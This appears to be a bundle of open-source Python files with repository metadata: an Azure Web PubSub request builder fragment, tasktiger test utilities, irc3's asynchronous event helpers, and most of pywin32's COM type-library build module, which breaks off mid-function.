api_version = kwargs.pop('api_version', "2021-05-01-preview") # type: Optional[str]
# Construct URL
url = kwargs.pop("template_url", '/api/hubs/{hub}/permissions/{permission}/connections/{connectionId}')
path_format_arguments = {
'hub': _SERIALIZER.url("hub", hub, 'str', pattern=r'^[A-Za-z][A-Za-z0-9_`,.[\]]{0,127}$'),
'permission': _SERIALIZER.url("permission", permission, 'str'),
'connectionId': _SERIALIZER.url("connection_id", connection_id, 'str', min_length=1),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
if target_name is not None:
query_parameters['targetName'] = _SERIALIZER.query("target_name", target_name, 'str')
if api_version is not None:
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
return HttpRequest(
method="HEAD",
url=url,
params=query_parameters,
**kwargs
)
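# Hedged usage sketch for the HEAD-style builders above (group exists, user
# exists, check permission): the service answers with a status code only, so the
# result is read from `response.status_code`. The 200/404 convention is an
# assumption based on typical HEAD semantics in this API:
#
#   request = build_group_exists_request(hub="chat", group="room1")
#   response = client.send_request(request)  # client as in the earlier sketch
#   group_has_connections = response.status_code == 200  # 404 -> no connections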
|
00b88bff3210d4acc652c07da75c700f442397bd
|
f6b0151d060baa65e09fc84f2761042dae49aa2a
|
/tests/utils.py
|
582250cb32db9db42c1af31d557ffab34490380b
|
[
"MIT"
] |
permissive
|
closeio/tasktiger
|
8e5686120f7432b0aa01f667f484412e07e0c985
|
1e1672f2293f845c735b5e0c3277458552becbe7
|
refs/heads/master
| 2023-08-28T03:53:50.303526
| 2023-08-24T10:29:36
| 2023-08-24T10:29:36
| 35,581,334
| 1,344
| 94
|
MIT
| 2023-09-11T10:42:08
| 2015-05-14T00:26:32
|
Python
|
UTF-8
|
Python
| false
| false
| 2,418
|
py
|
utils.py
|
import datetime
import logging
import time
import redis
import structlog
from tasktiger import TaskTiger, Worker, fixed
from .config import DELAY, REDIS_HOST, TEST_DB
TEST_TIGER_CONFIG = {
    "ACTIVE_TASK_UPDATE_TIMEOUT": 2 * DELAY,
    "BATCH_QUEUES": {"batch": 3},
    "DEFAULT_RETRY_METHOD": fixed(DELAY, 2),
    "EXCLUDE_QUEUES": ["periodic_ignore"],
    "LOCK_RETRY": DELAY * 2.0,
    "QUEUE_SCHEDULED_TASKS_TIME": DELAY,
    "REQUEUE_EXPIRED_TASKS_INTERVAL": DELAY,
    # We need this 0 here so we don't pick up scheduled tasks when
    # doing a single worker run.
    "SELECT_TIMEOUT": 0,
    "SINGLE_WORKER_QUEUES": ["swq"],
}
class Patch:
"""
Simple context manager to patch a function, e.g.:
with Patch(module, 'func_name', mocked_func):
module.func_name() # will use mocked_func
module.func_name() # will use the original function
"""
def __init__(self, orig_obj, func_name, new_func):
self.orig_obj = orig_obj
self.func_name = func_name
self.new_func = new_func
def __enter__(self):
self.orig_func = getattr(self.orig_obj, self.func_name)
setattr(self.orig_obj, self.func_name, self.new_func)
def __exit__(self, *args):
setattr(self.orig_obj, self.func_name, self.orig_func)
def setup_structlog():
structlog.configure(
logger_factory=structlog.stdlib.LoggerFactory(),
wrapper_class=structlog.stdlib.BoundLogger,
)
logging.basicConfig(format="%(message)s")
def get_redis():
return redis.Redis(host=REDIS_HOST, db=TEST_DB, decode_responses=True)
def get_tiger():
"""
Sets up logging and returns a new tasktiger instance.
"""
setup_structlog()
conn = get_redis()
tiger = TaskTiger(connection=conn, config=TEST_TIGER_CONFIG)
tiger.log.setLevel(logging.CRITICAL)
return tiger
def external_worker(n=None, patch_config=None, max_workers_per_queue=None):
"""
Runs a worker. To be used with multiprocessing.Pool.map.
"""
tiger = get_tiger()
if patch_config:
tiger.config.update(patch_config)
worker = Worker(tiger)
if max_workers_per_queue is not None:
worker.max_workers_per_queue = max_workers_per_queue
worker.run(once=True, force_once=True)
tiger.connection.close()
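# Hedged sketch: external_worker's docstring says it is meant for
# multiprocessing.Pool.map; the pool size and mapped argument values below are
# illustrative assumptions, not taken from the actual test suite:
#
#   from multiprocessing import Pool
#
#   with Pool(processes=2) as pool:
#       pool.map(external_worker, range(2))  # two independent single-pass workers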
def sleep_until_next_second():
now = datetime.datetime.utcnow()
time.sleep(1 - now.microsecond / 10.0**6)
|
76a72ec2188ba43ccc28fb7cf8538048eb550505
|
1f20484efc357aae4b7e2f98a191e7a9256f3a58
|
/irc3/asynchronous.py
|
e07d14cdc4fd88920dabb7c8bdc2726995796f59
|
[
"CC-BY-3.0",
"MIT",
"LicenseRef-scancode-ietf"
] |
permissive
|
gawel/irc3
|
55b2e4d01ca95f45077f8bad231394551584d7bd
|
76d6849d5e7a531d649aca766f623f9f30a55545
|
refs/heads/master
| 2023-07-15T20:49:40.188267
| 2023-04-17T09:02:31
| 2023-04-17T09:02:31
| 14,820,406
| 187
| 58
|
MIT
| 2023-02-27T10:18:41
| 2013-11-30T12:09:48
|
Python
|
UTF-8
|
Python
| false
| false
| 3,554
|
py
|
asynchronous.py
|
# -*- coding: utf-8 -*-
from .compat import asyncio
import re
class event:
iotype = 'in'
iscoroutine = True
def __init__(self, **kwargs):
# kwargs get interpolated into the regex.
# Any kwargs not ending in _re get escaped
self.meta = kwargs.get('meta')
regexp = self.meta['match'].format(**{
k: v if k.endswith('_re') else re.escape(v)
for (k, v) in kwargs.items()
if k != 'meta'
})
self.regexp = regexp
regexp = getattr(self.regexp, 're', self.regexp)
self.cregexp = re.compile(regexp).match
def compile(self, *args, **kwargs):
return self.cregexp
def __repr__(self):
s = getattr(self.regexp, 'name', self.regexp)
name = self.__class__.__name__
return '<temp_event {0} {1}>'.format(name, s)
def __call__(self, callback):
async def wrapper(*args, **kwargs):
return await callback(self, *args, **kwargs)
self.callback = wrapper
return self
def default_result_processor(results=None, **value):  # pragma: no cover
value['results'] = results
if len(results) == 1:
value.update(results[0])
return value
def async_events(context, events, send_line=None,
process_results=default_result_processor,
timeout=30, **params):
loop = context.loop
task = loop.create_future() # async result
results = [] # store events results
events_ = [] # reference registered events
# async timeout
timeout = asyncio.ensure_future(
asyncio.sleep(timeout, loop=loop), loop=loop)
def end(t=None):
"""t can be a future (timeout done) or False (result success)"""
if not task.done():
# cancel timeout if needed
if t is False:
timeout.cancel()
# detach events
context.detach_events(*events_)
# clean refs
events_[:] = []
# set results
task.set_result(process_results(results=results, timeout=bool(t)))
# end on timeout
timeout.add_done_callback(end)
def callback(e, **kw):
"""common callback for all events"""
results.append(kw)
if e.meta.get('multi') is not True:
context.detach_events(e)
events_.remove(e)
if e.meta.get('final') is True:
# end on success
end(False)
events_.extend([event(meta=kw, **params)(callback) for kw in events])
context.attach_events(*events_, insert=True)
if send_line:
context.send_line(send_line.format(**params))
return task
class AsyncEvents:
"""Asynchronious events"""
timeout = 30
send_line = None
events = []
def __init__(self, context):
self.context = context
def process_results(self, results=None, **value): # pragma: no cover
"""Process results.
        results is a list of dicts caught during the events.
        value is a dict containing some metadata (like timeout=True/False).
"""
return default_result_processor(results=results, **value)
def __call__(self, **kwargs):
"""Register events; and callbacks then return a `asyncio.Future`.
Events regexp are compiled with `params`"""
kwargs.setdefault('timeout', self.timeout)
kwargs.setdefault('send_line', self.send_line)
kwargs['process_results'] = self.process_results
return async_events(self.context, self.events, **kwargs)
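# Hedged sketch of specializing AsyncEvents (modeled loosely on the helpers in
# irc3.async; the 303/RPL_ISON regexp below is an illustrative assumption, not
# the library's exact pattern):
#
#   class IsOn(AsyncEvents):
#       send_line = 'ISON :{nicknames}'
#       events = (
#           {'match': r"(?i)^:\S+ 303 \S+ :(?P<nicknames>.*)", 'final': True},
#       )
#
# A plugin would then await `IsOn(context)(nicknames='gawel', timeout=5)`.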
|
664798511939ed739259077279029ce453851e59
|
2181883c8faac55bfc969a97d22d9b24a3e81ab3
|
/com/win32com/client/build.py
|
84dacb566a23463c30c211599b5e2dd691735ac8
|
[
"PSF-2.0"
] |
permissive
|
mhammond/pywin32
|
574bf121cfeac8c7a9d28f94ee0f2069a425e8ab
|
2a7137f21965013020ef9e4f27565db6dea59003
|
refs/heads/main
| 2023-09-02T13:16:52.307262
| 2023-08-17T19:42:26
| 2023-08-17T19:42:26
| 108,187,130
| 4,757
| 907
| null | 2023-08-23T01:45:49
| 2017-10-24T21:44:27
|
C++
|
UTF-8
|
Python
| false
| false
| 28,904
|
py
|
build.py
|
"""Contains knowledge to build a COM object definition.
This module is used by both the @dynamic@ and @makepy@ modules to build
all knowledge of a COM object.
This module contains classes which contain the actual knowledge of the object.
This include parameter and return type information, the COM dispid and CLSID, etc.
Other modules may use this information to generate .py files, use the information
dynamically, or possibly even generate .html documentation for objects.
"""
#
# NOTES: DispatchItem and MapEntry used by dynamic.py.
# the rest is used by makepy.py
#
# OleItem, DispatchItem, MapEntry, BuildCallList() is used by makepy
import datetime
import string
from keyword import iskeyword
import pythoncom
import winerror
from pywintypes import TimeType
# It isn't really clear what the quoting rules are in a C/IDL string, and
# literals like a quote char and backslashes make life a little painful to
# always render the string perfectly - so just punt and fall back to a repr()
def _makeDocString(s):
return repr(s)
error = "PythonCOM.Client.Build error"
class NotSupportedException(Exception):
    pass  # Raised when we can't support a param type.
DropIndirection = "DropIndirection"
NoTranslateTypes = [
pythoncom.VT_BOOL,
pythoncom.VT_CLSID,
pythoncom.VT_CY,
pythoncom.VT_DATE,
pythoncom.VT_DECIMAL,
pythoncom.VT_EMPTY,
pythoncom.VT_ERROR,
pythoncom.VT_FILETIME,
pythoncom.VT_HRESULT,
pythoncom.VT_I1,
pythoncom.VT_I2,
pythoncom.VT_I4,
pythoncom.VT_I8,
pythoncom.VT_INT,
pythoncom.VT_NULL,
pythoncom.VT_R4,
    pythoncom.VT_R8,
    pythoncom.VT_STREAM,
pythoncom.VT_UI1,
pythoncom.VT_UI2,
pythoncom.VT_UI4,
pythoncom.VT_UI8,
pythoncom.VT_UINT,
pythoncom.VT_VOID,
]
NoTranslateMap = {}
for v in NoTranslateTypes:
NoTranslateMap[v] = None
class MapEntry:
"Simple holder for named attibutes - items in a map."
def __init__(
self,
desc_or_id,
names=None,
doc=None,
resultCLSID=pythoncom.IID_NULL,
resultDoc=None,
hidden=0,
):
if isinstance(desc_or_id, int):
self.dispid = desc_or_id
self.desc = None
else:
self.dispid = desc_or_id[0]
self.desc = desc_or_id
self.names = names
self.doc = doc
self.resultCLSID = resultCLSID
self.resultDocumentation = resultDoc
self.wasProperty = (
0 # Have I been transformed into a function so I can pass args?
)
self.hidden = hidden
def __repr__(self):
return (
"MapEntry(dispid={s.dispid}, desc={s.desc}, names={s.names}, doc={s.doc!r}, "
"resultCLSID={s.resultCLSID}, resultDocumentation={s.resultDocumentation}, "
"wasProperty={s.wasProperty}, hidden={s.hidden}"
).format(s=self)
def GetResultCLSID(self):
rc = self.resultCLSID
if rc == pythoncom.IID_NULL:
return None
return rc
# Return a string, suitable for output - either "'{...}'" or "None"
def GetResultCLSIDStr(self):
rc = self.GetResultCLSID()
if rc is None:
return "None"
return repr(
str(rc)
) # Convert the IID object to a string, then to a string in a string.
def GetResultName(self):
if self.resultDocumentation is None:
return None
return self.resultDocumentation[0]
class OleItem:
typename = "OleItem"
def __init__(self, doc=None):
self.doc = doc
if self.doc:
self.python_name = MakePublicAttributeName(self.doc[0])
else:
self.python_name = None
self.bWritten = 0
self.bIsDispatch = 0
self.bIsSink = 0
self.clsid = None
self.co_class = None
class DispatchItem(OleItem):
typename = "DispatchItem"
def __init__(self, typeinfo=None, attr=None, doc=None, bForUser=1):
OleItem.__init__(self, doc)
self.propMap = {}
self.propMapGet = {}
self.propMapPut = {}
self.mapFuncs = {}
self.defaultDispatchName = None
self.hidden = 0
if typeinfo:
self.Build(typeinfo, attr, bForUser)
def _propMapPutCheck_(self, key, item):
ins, outs, opts = self.CountInOutOptArgs(item.desc[2])
if ins > 1: # if a Put property takes more than 1 arg:
if opts + 1 == ins or ins == item.desc[6] + 1:
newKey = "Set" + key
deleteExisting = 0 # This one is still OK
else:
deleteExisting = 1 # No good to us
if key in self.mapFuncs or key in self.propMapGet:
newKey = "Set" + key
else:
newKey = key
item.wasProperty = 1
self.mapFuncs[newKey] = item
if deleteExisting:
del self.propMapPut[key]
def _propMapGetCheck_(self, key, item):
ins, outs, opts = self.CountInOutOptArgs(item.desc[2])
if ins > 0: # if a Get property takes _any_ in args:
if item.desc[6] == ins or ins == opts:
newKey = "Get" + key
deleteExisting = 0 # This one is still OK
else:
deleteExisting = 1 # No good to us
if key in self.mapFuncs:
newKey = "Get" + key
else:
newKey = key
item.wasProperty = 1
self.mapFuncs[newKey] = item
if deleteExisting:
del self.propMapGet[key]
def _AddFunc_(self, typeinfo, fdesc, bForUser):
assert fdesc.desckind == pythoncom.DESCKIND_FUNCDESC
id = fdesc.memid
funcflags = fdesc.wFuncFlags
try:
names = typeinfo.GetNames(id)
name = names[0]
except pythoncom.ole_error:
name = ""
names = None
doc = None
try:
if bForUser:
doc = typeinfo.GetDocumentation(id)
except pythoncom.ole_error:
pass
if id == 0 and name:
self.defaultDispatchName = name
invkind = fdesc.invkind
        # We need to translate any Aliases, Enums, structs etc in result and args
typerepr, flag, defval = fdesc.rettype
# sys.stderr.write("%s result - %s -> " % (name, typerepr))
typerepr, resultCLSID, resultDoc = _ResolveType(typerepr, typeinfo)
# sys.stderr.write("%s\n" % (typerepr,))
fdesc.rettype = typerepr, flag, defval, resultCLSID
# Translate any Alias or Enums in argument list.
argList = []
for argDesc in fdesc.args:
typerepr, flag, defval = argDesc
# sys.stderr.write("%s arg - %s -> " % (name, typerepr))
arg_type, arg_clsid, arg_doc = _ResolveType(typerepr, typeinfo)
argDesc = arg_type, flag, defval, arg_clsid
# sys.stderr.write("%s\n" % (argDesc[0],))
argList.append(argDesc)
fdesc.args = tuple(argList)
hidden = (funcflags & pythoncom.FUNCFLAG_FHIDDEN) != 0
if invkind == pythoncom.INVOKE_PROPERTYGET:
map = self.propMapGet
        # This is not the best solution, but I don't think there is
        # one without specific "set" syntax.
        # If there is a single PUT or PUTREF, it will function as a property.
        # If there are both, then the PUT remains a property, and the PUTREF
        # gets transformed into a function.
        # (in VB, PUT == "obj = other_obj", PUTREF == "set obj = other_obj")
elif invkind in (pythoncom.INVOKE_PROPERTYPUT, pythoncom.INVOKE_PROPERTYPUTREF):
# Special case
existing = self.propMapPut.get(name, None)
if existing is not None:
if existing.desc[4] == pythoncom.INVOKE_PROPERTYPUT: # Keep this one
map = self.mapFuncs
name = "Set" + name
else: # Existing becomes a func.
existing.wasProperty = 1
self.mapFuncs["Set" + name] = existing
map = self.propMapPut # existing gets overwritten below.
else:
                map = self.propMapPut  # first time we've seen it.
elif invkind == pythoncom.INVOKE_FUNC:
map = self.mapFuncs
else:
map = None
        if map is not None:
# if map.has_key(name):
# sys.stderr.write("Warning - overwriting existing method/attribute %s\n" % name)
map[name] = MapEntry(fdesc, names, doc, resultCLSID, resultDoc, hidden)
            # any methods that can't be reached via DISPATCH we return None
            # for, so dynamic dispatch doesn't see it.
if fdesc.funckind != pythoncom.FUNC_DISPATCH:
return None
return (name, map)
return None
def _AddVar_(self, typeinfo, vardesc, bForUser):
### need pythoncom.VARFLAG_FRESTRICTED ...
### then check it
assert vardesc.desckind == pythoncom.DESCKIND_VARDESC
if vardesc.varkind == pythoncom.VAR_DISPATCH:
id = vardesc.memid
names = typeinfo.GetNames(id)
# Translate any Alias or Enums in result.
typerepr, flags, defval = vardesc.elemdescVar
typerepr, resultCLSID, resultDoc = _ResolveType(typerepr, typeinfo)
vardesc.elemdescVar = typerepr, flags, defval
doc = None
try:
if bForUser:
doc = typeinfo.GetDocumentation(id)
except pythoncom.ole_error:
pass
# handle the enumerator specially
map = self.propMap
# Check if the element is hidden.
hidden = (vardesc.wVarFlags & 0x40) != 0 # VARFLAG_FHIDDEN
map[names[0]] = MapEntry(
vardesc, names, doc, resultCLSID, resultDoc, hidden
)
return (names[0], map)
else:
return None
def Build(self, typeinfo, attr, bForUser=1):
self.clsid = attr[0]
self.bIsDispatch = (attr.wTypeFlags & pythoncom.TYPEFLAG_FDISPATCHABLE) != 0
if typeinfo is None:
return
# Loop over all methods
for j in range(attr[6]):
fdesc = typeinfo.GetFuncDesc(j)
self._AddFunc_(typeinfo, fdesc, bForUser)
# Loop over all variables (ie, properties)
for j in range(attr[7]):
fdesc = typeinfo.GetVarDesc(j)
self._AddVar_(typeinfo, fdesc, bForUser)
# Now post-process the maps. For any "Get" or "Set" properties
# that have arguments, we must turn them into methods. If a method
# of the same name already exists, change the name.
for key, item in list(self.propMapGet.items()):
self._propMapGetCheck_(key, item)
for key, item in list(self.propMapPut.items()):
self._propMapPutCheck_(key, item)
def CountInOutOptArgs(self, argTuple):
"Return tuple counting in/outs/OPTS. Sum of result may not be len(argTuple), as some args may be in/out."
ins = out = opts = 0
for argCheck in argTuple:
inOut = argCheck[1]
if inOut == 0:
ins = ins + 1
out = out + 1
else:
if inOut & pythoncom.PARAMFLAG_FIN:
ins = ins + 1
if inOut & pythoncom.PARAMFLAG_FOPT:
opts = opts + 1
if inOut & pythoncom.PARAMFLAG_FOUT:
out = out + 1
return ins, out, opts
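    # e.g. an argTuple of three (type, flags, default) entries whose flags are
    # PARAMFLAG_FIN, PARAMFLAG_FIN | PARAMFLAG_FOPT and PARAMFLAG_FOUT
    # respectively yields (ins, out, opts) == (2, 1, 1).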
def MakeFuncMethod(self, entry, name, bMakeClass=1):
# If we have a type description, and not varargs...
if entry.desc is not None and (len(entry.desc) < 6 or entry.desc[6] != -1):
return self.MakeDispatchFuncMethod(entry, name, bMakeClass)
else:
return self.MakeVarArgsFuncMethod(entry, name, bMakeClass)
def MakeDispatchFuncMethod(self, entry, name, bMakeClass=1):
fdesc = entry.desc
doc = entry.doc
names = entry.names
ret = []
if bMakeClass:
linePrefix = "\t"
defNamedOptArg = "defaultNamedOptArg"
defNamedNotOptArg = "defaultNamedNotOptArg"
defUnnamedArg = "defaultUnnamedArg"
else:
linePrefix = ""
defNamedOptArg = "pythoncom.Missing"
defNamedNotOptArg = "pythoncom.Missing"
defUnnamedArg = "pythoncom.Missing"
defOutArg = "pythoncom.Missing"
id = fdesc[0]
s = (
linePrefix
+ "def "
+ name
+ "(self"
+ BuildCallList(
fdesc,
names,
defNamedOptArg,
defNamedNotOptArg,
defUnnamedArg,
defOutArg,
)
+ "):"
)
ret.append(s)
if doc and doc[1]:
ret.append(linePrefix + "\t" + _makeDocString(doc[1]))
resclsid = entry.GetResultCLSID()
if resclsid:
resclsid = "'%s'" % resclsid
else:
resclsid = "None"
# Strip the default values from the arg desc
retDesc = fdesc[8][:2]
argsDesc = tuple([what[:2] for what in fdesc[2]])
# The runtime translation of the return types is expensive, so when we know the
# return type of the function, there is no need to check the type at runtime.
# To qualify, this function must return a "simple" type, and have no byref args.
# Check if we have byrefs or anything in the args which mean we still need a translate.
param_flags = [what[1] for what in fdesc[2]]
bad_params = [
flag
for flag in param_flags
if flag & (pythoncom.PARAMFLAG_FOUT | pythoncom.PARAMFLAG_FRETVAL) != 0
]
s = None
if len(bad_params) == 0 and len(retDesc) == 2 and retDesc[1] == 0:
rd = retDesc[0]
if rd in NoTranslateMap:
s = "%s\treturn self._oleobj_.InvokeTypes(%d, LCID, %s, %s, %s%s)" % (
linePrefix,
id,
fdesc[4],
retDesc,
argsDesc,
_BuildArgList(fdesc, names),
)
elif rd in [pythoncom.VT_DISPATCH, pythoncom.VT_UNKNOWN]:
s = "%s\tret = self._oleobj_.InvokeTypes(%d, LCID, %s, %s, %s%s)\n" % (
linePrefix,
id,
fdesc[4],
retDesc,
repr(argsDesc),
_BuildArgList(fdesc, names),
)
s = s + "%s\tif ret is not None:\n" % (linePrefix,)
if rd == pythoncom.VT_UNKNOWN:
s = s + "%s\t\t# See if this IUnknown is really an IDispatch\n" % (
linePrefix,
)
s = s + "%s\t\ttry:\n" % (linePrefix,)
s = (
s
+ "%s\t\t\tret = ret.QueryInterface(pythoncom.IID_IDispatch)\n"
% (linePrefix,)
)
s = s + "%s\t\texcept pythoncom.error:\n" % (linePrefix,)
s = s + "%s\t\t\treturn ret\n" % (linePrefix,)
s = s + "%s\t\tret = Dispatch(ret, %s, %s)\n" % (
linePrefix,
repr(name),
resclsid,
)
s = s + "%s\treturn ret" % (linePrefix)
elif rd == pythoncom.VT_BSTR:
s = "%s\t# Result is a Unicode object\n" % (linePrefix,)
s = (
s
+ "%s\treturn self._oleobj_.InvokeTypes(%d, LCID, %s, %s, %s%s)"
% (
linePrefix,
id,
fdesc[4],
retDesc,
repr(argsDesc),
_BuildArgList(fdesc, names),
)
)
# else s remains None
if s is None:
s = "%s\treturn self._ApplyTypes_(%d, %s, %s, %s, %s, %s%s)" % (
linePrefix,
id,
fdesc[4],
retDesc,
argsDesc,
repr(name),
resclsid,
_BuildArgList(fdesc, names),
)
ret.append(s)
ret.append("")
return ret
def MakeVarArgsFuncMethod(self, entry, name, bMakeClass=1):
fdesc = entry.desc
names = entry.names
doc = entry.doc
ret = []
argPrefix = "self"
if bMakeClass:
linePrefix = "\t"
else:
linePrefix = ""
ret.append(linePrefix + "def " + name + "(" + argPrefix + ", *args):")
if doc and doc[1]:
ret.append(linePrefix + "\t" + _makeDocString(doc[1]))
if fdesc:
invoketype = fdesc[4]
else:
invoketype = pythoncom.DISPATCH_METHOD
s = linePrefix + "\treturn self._get_good_object_(self._oleobj_.Invoke(*(("
ret.append(
s + str(entry.dispid) + ",0,%d,1)+args)),'%s')" % (invoketype, names[0])
)
ret.append("")
return ret
# Note - "DispatchItem" poorly named - need a new intermediate class.
class VTableItem(DispatchItem):
def Build(self, typeinfo, attr, bForUser=1):
DispatchItem.Build(self, typeinfo, attr, bForUser)
        assert typeinfo is not None, "Can't build vtables without type info!"
meth_list = (
list(self.mapFuncs.values())
+ list(self.propMapGet.values())
+ list(self.propMapPut.values())
)
meth_list.sort(key=lambda m: m.desc[7])
# Now turn this list into the run-time representation
# (ready for immediate use or writing to gencache)
self.vtableFuncs = []
for entry in meth_list:
self.vtableFuncs.append((entry.names, entry.dispid, entry.desc))
# A Lazy dispatch item - builds an item on request using info from
# an ITypeComp. The dynamic module makes the call to build each item,
# and also holds the references to the typeinfo and typecomp.
class LazyDispatchItem(DispatchItem):
typename = "LazyDispatchItem"
def __init__(self, attr, doc):
self.clsid = attr[0]
DispatchItem.__init__(self, None, attr, doc, 0)
typeSubstMap = {
pythoncom.VT_INT: pythoncom.VT_I4,
pythoncom.VT_UINT: pythoncom.VT_UI4,
pythoncom.VT_HRESULT: pythoncom.VT_I4,
}
def _ResolveType(typerepr, itypeinfo):
# Resolve VT_USERDEFINED (often aliases or typed IDispatches)
if isinstance(typerepr, tuple):
indir_vt, subrepr = typerepr
if indir_vt == pythoncom.VT_PTR:
# If it is a VT_PTR to a VT_USERDEFINED that is an IDispatch/IUnknown,
# then it resolves to simply the object.
# Otherwise, it becomes a ByRef of the resolved type
# We need to drop an indirection level on pointer to user defined interfaces.
# eg, (VT_PTR, (VT_USERDEFINED, somehandle)) needs to become VT_DISPATCH
# only when "somehandle" is an object.
# but (VT_PTR, (VT_USERDEFINED, otherhandle)) doesnt get the indirection dropped.
was_user = (
isinstance(subrepr, tuple) and subrepr[0] == pythoncom.VT_USERDEFINED
)
subrepr, sub_clsid, sub_doc = _ResolveType(subrepr, itypeinfo)
if was_user and subrepr in [
pythoncom.VT_DISPATCH,
pythoncom.VT_UNKNOWN,
pythoncom.VT_RECORD,
]:
# Drop the VT_PTR indirection
return subrepr, sub_clsid, sub_doc
# Change PTR indirection to byref
return subrepr | pythoncom.VT_BYREF, sub_clsid, sub_doc
if indir_vt == pythoncom.VT_SAFEARRAY:
# resolve the array element, and convert to VT_ARRAY
subrepr, sub_clsid, sub_doc = _ResolveType(subrepr, itypeinfo)
return pythoncom.VT_ARRAY | subrepr, sub_clsid, sub_doc
if indir_vt == pythoncom.VT_CARRAY: # runtime has no support for this yet.
# resolve the array element, and convert to VT_CARRAY
# sheesh - return _something_
return pythoncom.VT_CARRAY, None, None
if indir_vt == pythoncom.VT_USERDEFINED:
try:
resultTypeInfo = itypeinfo.GetRefTypeInfo(subrepr)
except pythoncom.com_error as details:
if details.hresult in [
winerror.TYPE_E_CANTLOADLIBRARY,
winerror.TYPE_E_LIBNOTREGISTERED,
]:
# an unregistered interface
return pythoncom.VT_UNKNOWN, None, None
raise
resultAttr = resultTypeInfo.GetTypeAttr()
typeKind = resultAttr.typekind
if typeKind == pythoncom.TKIND_ALIAS:
tdesc = resultAttr.tdescAlias
return _ResolveType(tdesc, resultTypeInfo)
elif typeKind in [pythoncom.TKIND_ENUM, pythoncom.TKIND_MODULE]:
# For now, assume Long
return pythoncom.VT_I4, None, None
elif typeKind == pythoncom.TKIND_DISPATCH:
clsid = resultTypeInfo.GetTypeAttr()[0]
retdoc = resultTypeInfo.GetDocumentation(-1)
return pythoncom.VT_DISPATCH, clsid, retdoc
elif typeKind in [pythoncom.TKIND_INTERFACE, pythoncom.TKIND_COCLASS]:
# XXX - should probably get default interface for CO_CLASS???
clsid = resultTypeInfo.GetTypeAttr()[0]
retdoc = resultTypeInfo.GetDocumentation(-1)
return pythoncom.VT_UNKNOWN, clsid, retdoc
elif typeKind == pythoncom.TKIND_RECORD:
return pythoncom.VT_RECORD, None, None
            raise NotSupportedException("Cannot resolve alias or user-defined type")
return typeSubstMap.get(typerepr, typerepr), None, None
def _BuildArgList(fdesc, names):
"Builds list of args to the underlying Invoke method."
# Word has TypeInfo for Insert() method, but says "no args"
numArgs = max(fdesc[6], len(fdesc[2]))
names = list(names)
while None in names:
i = names.index(None)
names[i] = "arg%d" % (i,)
# We've seen 'source safe' libraries offer the name of 'ret' params in
# 'names' - although we can't reproduce this, it would be insane to offer
# more args than we have arg infos for - hence the upper limit on names...
names = list(map(MakePublicAttributeName, names[1 : (numArgs + 1)]))
name_num = 0
while len(names) < numArgs:
names.append("arg%d" % (len(names),))
# As per BuildCallList(), avoid huge lines.
# Hack a "\n" at the end of every 5th name
for i in range(0, len(names), 5):
names[i] = names[i] + "\n\t\t\t"
return "," + ", ".join(names)
valid_identifier_chars = string.ascii_letters + string.digits + "_"
def demunge_leading_underscores(className):
i = 0
while className[i] == "_":
i += 1
assert i >= 2, "Should only be here with names starting with '__'"
return className[i - 1 :] + className[: i - 1]
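# e.g. demunge_leading_underscores("__copy") == "_copy_": all but one leading
# underscore are moved to the end, side-stepping Python's class-private mangling.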
# Given a "public name" (eg, the name of a class, function, etc)
# make sure it is a legal (and reasonable!) Python name.
def MakePublicAttributeName(className, is_global=False):
# Given a class attribute that needs to be public, convert it to a
# reasonable name.
    # Also need to be careful that the munging doesn't
# create duplicates - eg, just removing a leading "_" is likely to cause
# a clash.
# if is_global is True, then the name is a global variable that may
# overwrite a builtin - eg, "None"
if className[:2] == "__":
return demunge_leading_underscores(className)
elif className == "None":
# assign to None is evil (and SyntaxError in 2.4, even though
# iskeyword says False there) - note that if it was a global
# it would get picked up below
className = "NONE"
elif iskeyword(className):
# most keywords are lower case (except True, False, etc)
ret = className.capitalize()
# but those which aren't get forced upper.
if ret == className:
ret = ret.upper()
return ret
elif is_global and hasattr(__builtins__, className):
# builtins may be mixed case. If capitalizing it doesn't change it,
        # force to all uppercase (eg, "None", "True" become "NONE", "TRUE")
ret = className.capitalize()
if ret == className: # didn't change - force all uppercase.
ret = ret.upper()
return ret
# Strip non printable chars
return "".join([char for char in className if char in valid_identifier_chars])
# Given a default value passed by a type library, return a string with
# an appropriate repr() for the type.
# Takes a raw ELEMDESC and returns a repr string, or None
# (NOTE: The string itself may be '"None"', which is valid, and different from None.)
# XXX - To do: Dates are probably screwed, but can they come in?
def MakeDefaultArgRepr(defArgVal):
try:
inOut = defArgVal[1]
except IndexError:
        # something strange - assume it is an in param.
inOut = pythoncom.PARAMFLAG_FIN
if inOut & pythoncom.PARAMFLAG_FHASDEFAULT:
# times need special handling...
val = defArgVal[2]
if isinstance(val, datetime.datetime):
# VARIANT <-> SYSTEMTIME conversions always lose any sub-second
# resolution, so just use a 'timetuple' here.
return repr(tuple(val.utctimetuple()))
if isinstance(val, TimeType):
# must be the 'old' pywintypes time object...
year = val.year
month = val.month
day = val.day
hour = val.hour
minute = val.minute
second = val.second
msec = val.msec
return (
"pywintypes.Time((%(year)d, %(month)d, %(day)d, %(hour)d, %(minute)d, %(second)d,0,0,0,%(msec)d))"
% locals()
)
return repr(val)
return None
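# e.g. an arg desc of (vt, PARAMFLAG_FIN | PARAMFLAG_FHASDEFAULT, 42) yields
# "42", while an arg without PARAMFLAG_FHASDEFAULT yields None.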
def BuildCallList(
fdesc,
names,
defNamedOptArg,
defNamedNotOptArg,
defUnnamedArg,
defOutArg,
is_comment=False,
):
"Builds a Python declaration for a method."
# Names[0] is the func name - param names are from 1.
numArgs = len(fdesc[2])
numOptArgs = fdesc[6]
strval = ""
if numOptArgs == -1: # Special value that says "var args after here"
firstOptArg = numArgs
numArgs = numArgs - 1
else:
firstOptArg = numArgs - numOptArgs
for arg in range(numArgs):
try:
argName = names[arg + 1]
namedArg = argName is not None
except IndexError:
namedArg = 0
if not namedArg:
argName = "arg%d" % (arg)
thisdesc = fdesc[2][arg]
# See if the IDL specified a default value
defArgVal = MakeDefaultArgRepr(thisdesc)
if defArgVal is None:
# Out params always get their special default
if (
thisdesc[1] & (pythoncom.PARAMFLAG_FOUT | pythoncom.PARAMFLAG_FIN)
== pythoncom.PARAMFLAG_FOUT
):
defArgVal = defOutArg
else:
# Unnamed arg - always allow default values.
if namedArg:
# Is a named argument
if arg >= firstOptArg:
defArgVal = defNamedOptArg
else:
defArgVal = defNamedNotOptArg
else:
defArgVal = defUnnamedArg
argName = MakePublicAttributeName(argName)
# keep 5 args per line
# This may still fail if the arg names are insane, but that seems
